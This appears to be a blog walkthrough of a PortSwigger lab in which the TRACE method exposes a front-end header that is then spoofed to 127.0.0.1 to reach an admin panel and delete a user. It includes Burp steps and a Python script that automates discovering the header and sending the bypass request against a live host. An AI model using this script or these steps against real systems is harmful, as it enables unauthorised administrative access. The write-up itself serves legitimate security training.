June 21, 2026
PortSwigger: Information Disclosure (Authentication bypass via information disclosure)
Information Disclosure is a vulnerability where a web application accidentally reveals sensitive information to its users.
Salsabela Maharany
The admin interface trusts a custom HTTP header that the front-end adds to incoming requests, so anyone who can set that header themselves can bypass authentication. We need to discover the header's name via the TRACE method, then send it ourselves to reach the admin interface and delete the user carlos.
Lab 5: Authentication bypass via information disclosure
This lab's administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end.
To solve the lab, obtain the header name then use it to bypass the lab's authentication. Access the admin interface and delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Log in as wiener:peter. In Burp, open the Proxy tab, go to HTTP history, find the GET / request, right-click it and choose "Send to Repeater".
In Repeater, change the method from GET to TRACE and click Send. TRACE echoes the request exactly as the back-end received it, so the Response panel shows every header on that request, including ones the front-end appended on the way in. Here that reveals a custom header named X-Custom-IP-Authorization, whose value is the client's own IP address.
Still in Repeater, change the request line back to
GET /admin
and below the existing headers add the header X-Custom-IP-Authorization: 127.0.0.1
then click Send. The response is now the admin page, because the back-end takes the spoofed loopback address as proof that the request came from a trusted front-end.
The browser's own requests will not carry this header, so to finish the lab either re-issue each admin request from Repeater with the header added (including the request behind the Delete link for carlos), or add a Match and Replace rule in Proxy options that appends X-Custom-IP-Authorization: 127.0.0.1 to every request, then browse to /admin and click "Delete" for user carlos.
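The same two-step flow, scripted, as an added example that is not part of the original write-up or of PortSwigger's solution: TRACE the site, diff the echoed request against what we actually sent to find any header the front-end injected, then request /admin with that header set to 127.0.0.1. The sample TRACE body and the IP in it are constructed; the lab hostname is passed on the command line, TLS is assumed, and the script assumes TRACE on / answers without a session cookie.

```python
"""TRACE-based discovery of a front-end-injected header, then the bypass request.

Constructed example (not the lab's or the author's code). SAMPLE_TRACE_BODY mimics
the shape of a message/http TRACE response; the IP value in it is made up.
"""
import http.client
import sys

# Constructed sample of a TRACE response body after the front-end has appended
# its own header to the request it forwarded.
SAMPLE_TRACE_BODY = (
    "TRACE / HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: trace-probe\r\n"
    "Accept-Encoding: identity\r\n"
    "X-Custom-IP-Authorization: 203.0.113.5\r\n"
    "\r\n"
)


def parse_echoed_request(trace_body: str) -> dict[str, str]:
    """Parse the message/http body of a TRACE response into {header: value}.

    The body is the request as the back-end received it, so any header the
    front-end injected on the way in shows up here.
    """
    headers: dict[str, str] = {}
    lines = trace_body.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:          # lines[0] is the echoed request line
        if not line.strip():        # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def injected_headers(sent: dict[str, str], echoed: dict[str, str]) -> dict[str, str]:
    """Headers present in the echoed request that we never sent.

    Diffing against what we actually put on the wire is more reliable than
    guessing from an 'X-' prefix: it catches any name the front-end adds.
    """
    sent_names = {n.lower() for n in sent}
    return {n: v for n, v in echoed.items() if n.lower() not in sent_names}


def discover_front_end_headers(host: str, path: str = "/") -> dict[str, str]:
    """Live step 1: TRACE the target and return headers the front-end added."""
    # Host and Accept-Encoding are set explicitly so http.client does not add
    # its own copies, keeping the comparison in injected_headers() exact.
    sent = {"Host": host, "User-Agent": "trace-probe", "Accept-Encoding": "identity"}
    conn = http.client.HTTPSConnection(host, timeout=10)
    conn.request("TRACE", path, headers=sent)
    body = conn.getresponse().read().decode("utf-8", errors="replace")
    conn.close()
    return injected_headers(sent, parse_echoed_request(body))


def fetch_admin(host: str, header_name: str, spoofed_ip: str = "127.0.0.1",
                path: str = "/admin") -> tuple[int, str]:
    """Live step 2: request the admin path with the discovered header set to loopback."""
    conn = http.client.HTTPSConnection(host, timeout=10)
    conn.request("GET", path, headers={header_name: spoofed_ip})
    resp = conn.getresponse()
    status, body = resp.status, resp.read().decode("utf-8", errors="replace")
    conn.close()
    return status, body


if __name__ == "__main__":
    # Usage: python trace_bypass.py <lab-host>   (hostname only; TLS assumed)
    target = sys.argv[1]
    added = discover_front_end_headers(target)
    print("headers added by the front-end:", added)
    for name in added:
        status, _ = fetch_admin(target, name)
        print(f"GET /admin with {name}: 127.0.0.1 -> HTTP {status}")
```

Any header the script reports is worth trying, not only one with "IP" in its name; the diff against the sent headers is what makes the discovery step independent of naming conventions. The delete step is left to Repeater or a Match and Replace rule, since the exact admin URLs are not part of this write-up.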